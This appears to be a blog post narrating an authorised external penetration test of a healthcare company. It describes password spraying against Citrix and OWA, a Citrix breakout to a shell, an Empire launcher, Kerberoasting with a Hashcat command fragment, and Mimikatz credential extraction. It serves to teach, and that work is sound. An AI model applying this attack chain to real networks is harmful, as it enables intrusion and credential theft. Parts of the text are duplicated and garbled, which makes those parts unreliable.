Complete guide to Perform External Penetration Testing Step by Step methods.

9 min readMar 9, 2022

This article describes one of my numerous external penetration testing travels and how I compromised the organization.

I always debrief my client’s top management after doing security assessments (e.g. Penetration Testing, Red Teaming, etc.).

This allows for discussion of attack tactics, techniques, and procedures (TTPs), attack vectors, results, recommendations, and remedial activities.

Most of the time, the leadership teams are shocked by how I got started on the network or the strategies I utilized.

Most of them expected Tom Cruise-style hacking, circumventing firewalls, etc., only to be surprised by my ease of penetration.

So, I frequently educate my clients about modern-day assaults and how a little gap as easy as a weak user credential may collapse the entire network protection.

In reality, cyber-attacks are more about efficiency than aesthetics. Aversives do not seek the most difficult paths in. They mainly search for the quickest entry.

One of these ways is login credentials, which we call the path of least resistance. One set of user credentials can expose your whole network to an attacker.

The Goal
In 2018, a significant healthcare business hired us to do external network penetration testing. The company provided us with their domain name and IP address ranges. Of course, the purpose was to find internet-based attack vectors.The Goal
In 2018, a significant healthcare business hired us to do external network penetration testing. The company provided us with their domain name and IP address ranges. Of course, the purpose was to find internet-based attack vectors.

Checklist for External Penetration

For every cyber-attack or network penetration test, reconnaissance is an essential method. Passive and active intelligence gathering is done at this step of the cyber kill chain.

With OSINT tools and platforms for External Penetration testing, I normally perform a lot of passive information collecting. When planning an attack approach, I rarely utilize network scanning tools against targets.

So, what do I look for in this phase?
From OSINT, I usually focus on the following items:

Subdomains Login pages (Citrix, OWA, VPN, SharePoint, etc.)
Technologies Types (IIS, etc.)
Email\saddresses
Lots of usernames
Tools for External Penetration
TheHarvester, SimplyEmail, Recon-ng, SimplyEmail, Shodan (shodan.io), Email Hunter (hunter.io), VirusTotal (virustotal.com), FOCA, Maltego and Pastebin (pastebin.com),

In addition, I was able to gather information on my customer from previous breaches and leaks such as subdomains, email addresses, and usernames.

To show one of the various methods I collected the username format and email addresses (and afterwards extracted the usernames) of my target customer, I’m using a mock domain and Email Hunter to demonstrate.

9,000+ email addresses and the username format for the target domain are shown below.

Checklist for External Penetration
For every cyber-attack or network penetration test, reconnaissance is an essential method. Passive and active intelligence gathering is done at this step of the cyber kill chain.

So, what do I look for in this phase?
From OSINT, I usually focus on the following items:

Subdomains

pages (Citrix, OWA, VPN, SharePoint, etc.)

Technologies

Types (IIS, etc.)
EmailS

addresses

Usernames

Lots of ‘em

Tools for External Penetration

TheHarvester, SimplyEmail, Recon-ng, SimplyEmail, Shodan (shodan.io), Email Hunter (hunter.io), VirusTotal (virustotal.com), FOCA, Maltego and Pastebin (pastebin.com),

In addition, I was able to gather information on my customer from previous breaches and leaks such as subdomains, email addresses, and usernames.

9,000+ email addresses and the username format for the target domain are shown below.

Targeted Growth

After spending a lot of time in the reconnaissance phase gathering data, I utilized this term to strategically lay out my attack surface and assault approach.

I was looking for application and network services that authenticate to the organization’s LDAP or AD infrastructure.

SMB, OWA, Autodiscover, VPN, Citrix, Jenkins, SharePoint, bespoke apps, etc. Once I knew which services to target, I categorized all the email addresses and usernames I had gathered throughout my research.

I checked to see if there were any duplicate email addresses or usernames, and if there were, I deleted them.

I had identified the client’s external OWA and Citrix apps, as well as close to 1,000 distinct usernames. Onto the next stage of my kill chain I went.

Intrusion

This is where the action is. In most attacks, the enemy uses this phase to gain early ground. The TTPs utilized in this phase will vary depending on the information acquired in the Reconnaissance and Target Development stages.

External penetration testing is all about efficiency and keeping things simple. In the early days of penetration testing, identifying and exploiting vulnerabilities was the norm.

But, when our competitors’ TTPs developed, we had to adapt. An authentication-based attack, commonly known as password brute-forcing, is a simple yet powerful attack tactic.

You have one login and you attempt numerous possible passwords against it, hoping the person uses one of your lists.

Administrators got wiser and implemented account lockout policies, such that after a particular number of failed login attempts (say five), the account locks out. To circumvent this, a new authentication-based attack dubbed Password Spray arose (some call it horizontal, reverse brute-forcing, etc.).

This attack aggregates many usernames or email addresses (depending on the application or network service being targeted) and then tests one password against all of them to see who is using it.

Most of my real-world attacks and penetration testing engagements have used this hacking approach. Burp Suite is my preferred tool for application-based password spray assaults.

Like threading, throttling, and grepping for text in Burp Suite. If I want to use a password for this attack, I generally attempt Season + Year (e.g. Summer2018, Winter19), CompanyName + Numbers (e.g. Choosing passwords for a password spray assault is a little like selecting a lottery.

I started the assault cautiously after configuring the Burp Suite online penetration testing tool against the client’s Citrix web application. My initial spray provided me two genuine Winter2017 user credentials.

Valid credentials are 208 and 853 in the figure below, with three layers of redirection.

**Password spray attack against Citrix login portal**

A solid start!

I was then able to authenticate as those users in the client’s Citrix apps. But, to my dismay, none of the users had any Citrix apps. What a pity.

Using two legitimate credentials, I leaked the client’s OWA Global Address List using Black Hills’ MailSniper (GAL). This offered me more usernames to utilize in my next password spray.

I used the password Companyname123 (the client’s name plus 123) to spray attack the client’s OWA this time. This gave me two more valid credentials. Valid credentials are 395 and 431 in the image below.vvvv

**This time, one of the users had an internal SAP application in their Citrix application catalog and this SAP application opens with Internet Explorer.**

Lateral Movement in EPT
The attacker or penetration tester has gained some degree of access to the target, either application or network level, with restricted or complete access.

The aim now is to go into the target’s network while avoiding internal network security restrictions.

To advance into the target’s internal network, we (adversaries/pentesters) obtain further information.

Basically, we’re back to reconnaissance, which might be host-based or network-based. Again, the strategies utilized in this phase might differ.

Citrix Blowout
I had gained application-level access and now wanted network-level access. Having previously broken out of Citrix systems, I viewed this as a chance to hack into the network.

NetSPI has an excellent blog regarding Citrix breakouts (see On The Web section for the link to the blog). When I opened the victim’s SAP account via Internet Explorer, I tried to save the webpage’s source code.

***Viewing Citrix application’s webpage source***

Using the File menu’s “Save As” option, I browsed to C:WindowsSystem32 and ran the Windows CMD tool (cmd.exe).

This pop opened CMD and gave me access to the backend Citrix server.

A PowerShell Empire listener was created and executed on the Citrix server, which then called my Empire listener.

***Running Empire PowerShell launcher on Citrix server***

Kerberoasting

‘Kerberoasting has been well discussed, so I will skip over that and move on to what happened next. Because Citrix servers are high-value systems, only a few users have administrative privileges on them.

That being stated, the user account with which I acquired unprivileged access to the Citrix server. Any domain user account can request Service Principal Names (SPN), a Windows feature used by Kerberos authentication to link a service instance with a service login account.

The AD may be queried locally using setspn.exe or remotely with programs like Empire, Impackets, Metasploit, etc.

I dumped the SPNs and used Hashcat to break the password hashes. Here is an example password cracking command:

-a 0 spn.outputpassword.list -r best64.rule

The SPN query result revealed various accounts in the Administrators group, one of which (IIS Admin) had its password hashes decrypted by Hashcat.

Credential Abuse/Re-use

I had gathered vital information about the internal network from this External Penetration Testing, such as the list of Domain Admins, Enterprise Admins, Domain Controllers, etc.

As a result, to successfully compromise the domain, I needed to know which systems the Domain Admins and/or Enterprise Admins had previously used.

Tools like netview.py and Invoke-EventHunter can help. I used the IIS Admin account and the cracked password to run CrackMapExec on a couple servers where Domain and Enterprise Admins were logged in.

I found a few servers where the IIS Admin account had administrator capabilities and used CrackMapExec’s Mimikatz module to extract credentials.

Data Hunting and Exfiltration

An adversary’s primary purpose is to access and/or retrieve sensitive/critical data, which we term the target’s “crown jewels.” This may be:

User

scredentials

Secret

sformulae

sBlueprints

Personal Identifiable Information (PII)

Medical

sRecords

Financial

sdata

Intellectual

sProperty

Exfiltration is the process of moving data from the target’s network to an attacker-controlled system (e.g. C2 server). This is generally done when data seeking.

Penetration testing used to be about acquiring DA level access and calling it a day.

After that, external penetration testing must show the business risk and effect if your tests and assaults were implemented by a real-world opponent. That being said, this is a vital point in our tests.

Before moving data out of a client’s environment, a penetration tester should confirm with them if data exfiltration is required under their Rules of Engagement.

If authorized, I thoroughly evaluate the data to show the customer the business risk and effect. Depending on the scenario and the hacked systems, multiple exfiltration strategies might be deployed.

External Penetration Testing

As you may have seen, I did not conduct any vulnerability scans on this test. Why bring it up? I’ve seen papers or work that purported to be external penetration testing but were actually vulnerability assessments.

The discussion over a penetration test vs a vulnerability assessment has been going on for a long time.

But, as I often say, we learn from each other and from our interactions, and there are many ways to skin a cat. One of the various methods I conduct external penetration testing. Please don’t hold me to a standard if my writing disappoints you!

Until then, thanks for reading.

Research On the Web

IOT Spy Net - Cyber Security Experts

IOT Spy Net is passionate about cybersecurity, private investigation, tracking and recovering of lost…

iotspynet.com